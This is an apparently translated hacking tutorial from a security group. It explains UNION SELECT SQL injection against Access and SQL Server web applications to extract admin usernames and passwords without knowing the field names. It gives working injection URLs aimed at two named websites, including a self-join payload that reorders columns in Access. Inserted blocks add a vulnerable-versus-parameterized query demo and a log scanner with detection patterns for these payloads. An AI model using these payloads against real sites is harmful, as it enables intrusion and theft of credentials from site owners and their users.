Get access, SQL Server, and other database data directly

Author: mix
PH4NT0M Security Team
http://www.ph4nt0m.org


When injecting SQL into an application backed by an Access database, you often run into two problems: the password is stored in Chinese, or you cannot guess the name of the key field. This technique solves both very quickly. Its minimum requirements are two:

1. The system uses an Access database and has a SQL injection vulnerability (MSSQL databases also support this technique).
2. You know the name of the table whose data is to be extracted and one field name in that table, which is typically the ID field.

The obvious advantages of this technique are:

1. Single quotes may not be needed at all, so filtering of ' has no effect on it.
2. The content of sensitive data is learned quickly; there is no slow guessing as before, and Chinese text, special characters and so on are all handled.
3. Sensitive data can still be retrieved quickly after SQL Server error messages have been turned off.
4. You can obtain the information you want without knowing the name of the key field (the one holding the data).

At first glance this technique may look difficult, but it is very simple. There are two difficulties in total: the first is easy to work out once you see the result, but the second is indeed a bit of trouble.

First, look at the UNION syntax. This is also the main principle behind extracting the data, as shown in the following illustration:



When we insert a UNION statement via SQL injection, as long as the two SELECT queries return the same number of columns, the result of the whole SQL statement also contains the rows of the UNION SELECT after it executes. That is what makes it possible to extract the data we need. Let's look at a simple example:

Http://www.chinakj.com/SoftView.asp?SoftID=3903%20union%20select%20username,password,1,1,1%20from%20admin

This server runs SQL Server with the return of error messages turned off, so the earlier methods cannot obtain sensitive data directly. After inserting the UNION statement via SQL injection, you can safely guess that the executed SQL statement becomes:

SELECT * FROM Soft where softid=3903 union select username,password,1,1,1 from admin

Under normal circumstances, the places on the page that display the 1st and 2nd fields of Soft will now show the username and password fields of admin, and the three 1s that follow are substituted into the remaining columns in the same way. Using this characteristic, we can also get the username and password fields directly from the Admin_userinfo table. The constructed statement looks like this:

http://www.chinakj.com/softview.asp?Softid=3903%20union%20select%20username,password,1,1,1%20from%20admin_userinfo%20where%20username<>'

The above is a simple use of UNION to obtain sensitive data, rather than slow brute-force guessing. To reach the goal of getting the same data without knowing the field names, we naturally think of using * in place of the field names. Then, as long as the number of fields represented by * plus the few 1s we add equals the number of fields in the script's own SELECT query, we can also get data whose field names we do not know.
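As an added example (not code from the original article), here is a runnable SQLite reconstruction of the bug the page describes, placed beside its hardened form. The table names, columns and sample rows are constructed assumptions modeled on the Soft and admin tables mentioned above; the injection succeeds only against the concatenated query.

```python
import sqlite3

# Constructed schema: a five-column "soft" table and a three-column "admin" table,
# as assumed from the article (not the real site's schema).
SCHEMA = """
CREATE TABLE soft (softid INTEGER, softname TEXT, softurl TEXT, hit INTEGER, ver TEXT);
CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
INSERT INTO soft VALUES (3903, 'WinZip', 'http://example.invalid/winzip', 10, '1.0');
INSERT INTO admin VALUES (1, 'root', 's3cret');
"""

# Constructed request value in the shape the article shows for SoftID.
PAYLOAD = "3903 union select username,password,1,1,1 from admin"


def _open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(softid):
    # The defect the article exploits: the request parameter is pasted into the SQL text,
    # so a UNION SELECT with a matching column count (5 here) merges admin rows into the result.
    conn = _open_db()
    sql = "SELECT * FROM soft WHERE softid=" + softid
    return conn.execute(sql).fetchall()


def safe_lookup(softid):
    # Hardened form: validate the type, then bind the value as a parameter.
    # The payload fails int() and never reaches the database; even a numeric
    # string is passed as data, not as SQL.
    try:
        value = int(softid)
    except ValueError:
        return []
    conn = _open_db()
    return conn.execute("SELECT * FROM soft WHERE softid=?", (value,)).fetchall()


if __name__ == "__main__":
    print("vulnerable:", vulnerable_lookup(PAYLOAD))
    print("safe:      ", safe_lookup(PAYLOAD))
```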

Consider this situation: the script runs the statement Select Id,hit,softname,softurl from soft where id=10, and the fields normally displayed on the web page are softname and softurl. So when we use UNION we must adjust the position of the *. The structure of a typical admin table is ID, username, password, so for the hypothetical statement above the injected SQL should be constructed as: Select 1,* from admin. The username and password fields replaced by * then land in the positions of the softname and softurl fields, so the web page obediently shows username and password. This is just the simplest example; in practice a table often has more than 10 fields, and the longest I have encountered had 43. So if the script queries with SELECT *, we have to construct the UNION SELECT with 1s filling out to 43 fields. Of course some fields are not displayed by the web page, which must be taken into account when choosing the position of the * after UNION SELECT; I don't think I need to say more about this.

The syntax described above works perfectly in SQL Server. But Access and SQL Server really do differ here. In SQL Server, the record set returned by the statement Select *,1,1,1 from admin is ordered as * 1 1 1. In Access the same query returns 1 1 1 *: no matter where you place the * among the group of 1s, the data it represents always ends up at the end of the query result. A more complex example illustrates this:

Http://www.hnp2p.com/mov/view.asp?id=1916%20union%20(select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin)

This site uses an Access database. You can see that the fields displayed normally are 2, 3, 7, 8, 10 and 11; the later fields are not shown. If you replace 14,15,16 with *, the page still shows the numbers, which means admin has three fields, certainly the structure ID, username, password, but apart from the ID field none of the other field names can be guessed. In Access, moving the position of the * as we did above in SQL Server does not work to extract the sensitive data, because Access always places the fields represented by * at the very end of the query's result set. The result of an Access query is always 1,2,3,4,5,6,7,8,9,10,11,12,13,*. To display the fields represented by *, we must move them to another position. First look at the result:

Http://www.hnp2p.com/mov/view.asp?id=1916%20union%20select%201,*%20from%20(((admin%20as%20a%20inner%20join%20admin%20as%20b%20on%20a.id=b.id)%20inner%20join%20admin%20as%20c%20on%20c.id=b.id)%20inner%20join%20admin%20as%20d%20on%20d.id=c.id)%20inner%20join%20admin%20as%20e%20on%20d.id=e.id

After executing such a constructed statement, the final query returns data in the following form (position on the first row, value on the second):

Position: 1  2     3       4      5     6       7      8     9       10     11    12      13     14    15      16
Value:    1  a.id  a.name  a.pwd  b.id  b.name  b.pwd  c.id  c.name  c.pwd  d.id  d.name  d.pwd  e.id  e.name  e.pwd

The 3rd and 7th fields are exactly the username and password values we want. Here I used the JOIN syntax, which joins (adds together) two tables to build a query result that meets our needs.

Joins are divided into full joins, left joins and right joins; see the SQL syntax for the specific differences. Here, in Access, whichever join method we choose, the effect is the same as a full join. Look at a simple join syntax:

SELECT *
FROM (table1 INNER JOIN table2 ON table1.serial = table2.serial)
INNER JOIN table3
ON table1.serial = table3.serial

Converted into a concrete instance, this becomes:

Select 1,2,3,4,*
From ((admin as a inner join admin as b on a.id=b.id)
inner join admin as c on c.id=b.id)
inner join admin as d on d.id=c.id

Using this pattern you can work out the SQL statement actually executed by the URL above: JOIN is used to chain the admin table to itself, and then the leading numeric fields are filled in. As long as the statement is built correctly, all data whose field names are unknown can be displayed on the page. This is the difficult part of the technique.
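As an added, defender-side example that is not from the original article: a small Python scanner that flags the three payload shapes this article shows (a UNION SELECT, numeric column enumeration, and a self-join chain on one table) in web-server query strings. The log lines are constructed, with a simplified IIS-style layout assumed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines (not from the article): date time client method path query status.
# The query strings mirror the payload shapes the article shows; the last line is a
# benign search term containing the word "union" to show the rules do not fire on it.
SAMPLE_LOG = """\
2004-01-01 10:00:01 10.0.0.5 GET /SoftView.asp SoftID=3903 200
2004-01-01 10:00:02 10.0.0.9 GET /SoftView.asp SoftID=3903%20union%20select%20username,password,1,1,1%20from%20admin 200
2004-01-01 10:00:03 10.0.0.9 GET /mov/view.asp id=1916%20union%20(select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin) 200
2004-01-01 10:00:04 10.0.0.9 GET /mov/view.asp id=1916%20union%20select%201,*%20from%20(((admin%20as%20a%20inner%20join%20admin%20as%20b%20on%20a.id=b.id)%20inner%20join%20admin%20as%20c%20on%20c.id=b.id)%20inner%20join%20admin%20as%20d%20on%20d.id=c.id)%20inner%20join%20admin%20as%20e%20on%20d.id=e.id 200
2004-01-01 10:00:05 10.0.0.7 GET /search.asp q=union+station 200
"""

UNION_SELECT = re.compile(r"\bunion\b\s*\(?\s*\bselect\b", re.I)
# "select 1,2,3,4,5,..." : four or more numeric placeholders in a row
NUM_ENUM = re.compile(r"\bselect\s+(?:\d+\s*,\s*){4,}", re.I)
# "inner join <table> as <alias>" : captures the joined table name
SELF_JOIN = re.compile(r"\binner\s+join\s+(\w+)\s+as\s+\w+\b", re.I)


def classify(query_string):
    """Return the list of injection indicators found in one URL-decoded query string."""
    q = unquote_plus(query_string)
    findings = []
    if UNION_SELECT.search(q):
        findings.append("union-select")
    if NUM_ENUM.search(q):
        findings.append("column-enumeration")
    joins = SELF_JOIN.findall(q)
    # Two or more inner joins all naming the same table is the self-join chain
    # used to push the "*" columns forward in Access result sets.
    if len(joins) >= 2 and len({t.lower() for t in joins}) == 1:
        findings.append("self-join-chain:%s x%d" % (joins[0], len(joins)))
    return findings


def scan(log_text):
    """Return (client, path, findings) for every log line that carries an indicator."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        client, path, qs = parts[2], parts[4], parts[5]
        findings = classify(qs)
        if findings:
            hits.append((client, path, findings))
    return hits
```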

All right, that's everything. It is entirely possible to write this technique into a program; only the construction of the statement is best left to the human brain ~ ~ ~ OH

